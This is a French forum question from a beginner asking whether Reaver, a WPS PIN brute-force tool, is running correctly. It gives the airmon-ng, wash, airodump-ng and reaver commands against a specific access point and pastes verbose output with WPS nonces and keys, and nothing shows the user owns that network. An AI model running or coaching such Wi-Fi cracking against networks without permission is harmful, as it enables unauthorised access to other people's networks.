Je suis nouveau sur Kali 2 et reaver et je l’apprécierais si une personne expérimentée dans ce domaine pouvait vérifier, sur la base du code ci-dessous, si cela fonctionne comme il se doit. Quand j'entre
airmon-ng start wlan0mon
wash -i wlan0mon
airodump-ng wlan0mon
et enfin
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv
Est-ce que cela signifie que le reaver fonctionne? Je sais que je devrais continuer à le laisser courir, mais la dernière fois, je crois que ça a gelé.
root@kali:~# reaver -i wlan0mon -b AC:EC:80:23:B1:50 -vv
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from XX:EC:80:23:B1:50
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 9
[+] Switching wlan0mon to channel 10
[+] Switching wlan0mon to channel 11
[+] Switching wlan0mon to channel 12
[+] Switching wlan0mon to channel 13
[+] Switching wlan0mon to channel 14
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 9
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 10
[+] Switching wlan0mon to channel 11
[+] Switching wlan0mon to channel 12
[+] Switching wlan0mon to channel 13
[+] Switching wlan0mon to channel 14
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 9
[+] Switching wlan0mon to channel 10
[+] Switching wlan0mon to channel 1
[+] Associated with AC:EC:80:23:B1:50 (ESSID: Name-2GH)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Switching wlan0mon to channel 11
[+] Switching wlan0mon to channel 12
[+] Switching wlan0mon to channel 13
[+] Switching wlan0mon to channel 14
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 9
[+] Switching wlan0mon to channel 10
[+] Switching wlan0mon to channel 11
[+] Switching wlan0mon to channel 12
[+] Switching wlan0mon to channel 1
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 1d:90:73:4d:03:b1:d2:27:ea:7d:ca:5d:7d:5e:6c:cd
[P] PKE: 81:20:d0:0b:d2:be:c7:cf:41:f8:3e:08:3a:17:2f:ee:44:65:9a:85:d9:5d:93:58:29:02:c2:fc:0d:cc:8f:e7:90:1b:0d:f9:02:76:50:89:83:d0:72:e8:87:f1:4d:12:38:81:15:87:e1:1f:e5:86:87:14:0d:6d:b9:91:84:96:93:66:2d:8f:96:f9:13:73:57:51:6b:c4:11:31:f2:e6:8b:1d:46:fe:28:46:1f:8a:fc:92:ea:b1:c8:8f:a3:d2:d9:71:d2:9a:3d:65:b3:d7:07:e8:20:f9:74:89:a8:d5:ff:e8:51:d5:d5:3d:3c:9f:2a:c6:db:4b:e9:78:a6:59:f5:3e:dc:17:9f:60:ae:f0:45:fb:94:de:a8:40:2c:34:db:38:62:1e:ba:76:4a:62:72:dd:1c:6f:37:c4:be:30:ad:a3:dc:d3:18:a9:c3:f1:74:aa:2b:b7:44:ad:b3:6d:a0:17:2f:bf:50:60:f4:f3:b9:22:f4:c2:fb:21:22:68
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Name: Celeno Wireless AP 2.4G
[P] WPS Model Number: CL1800
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: cb:17:7f:a8:22:c2:15:29:77:0c:b1:97:7a:e9:fa:6e
[P] PKR: a3:a1:49:6f:39:b9:bc:5b:42:e4:e5:4b:d1:51:6a:93:91:dd:4a:32:91:22:42:a4:4f:60:b8:34:5a:42:20:82:a6:16:fc:c3:f9:1a:c6:44:9f:87:05:cf:f8:b4:cc:a1:4c:cb:3d:ba:ed:cb:31:a0:c4:89:63:18:f3:40:49:6d:91:3b:7b:50:66:d5:4c:96:95:87:0d:41:56:c3:ed:4e:fa:37:4c:30:d8:75:45:14:80:a7:4d:ca:82:84:0e:7d:7c:5a:47:39:11:05:da:42:15:54:b0:f5:63:f9:62:4e:55:9d:56:ca:8a:eb:40:25:4f:63:33:3c:ba:64:0b:d6:d6:3c:46:fb:c5:f2:08:60:67:e0:27:aa:62:b8:38:bf:20:a0:77:88:47:7f:09:40:08:3d:77:f5:2a:7b:e6:af:e7:b6:8a:1c:ee:46:52:1f:71:86:b1:1a:5d:c1:23:94:ec:76:91:cc:4a:15:64:2f:1e:66:13:98:53:d8:83:97
[P] AuthKey: 6c:08:fb:2a:de:90:1f:2f:6c:10:71:e5:9c:b1:39:2a:e4:f5:c3:5d:5b:b5:ea:07:8c:6a:3a:d2:45:bd:a4:d3
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Je suppose que je suis juste à la recherche d'une confirmation de la part d'une personne expérimentée. Est-ce que Reaver travaille ici? J'ai besoin de savoir avant de laisser cette course pour le lendemain ou à peu près.
la source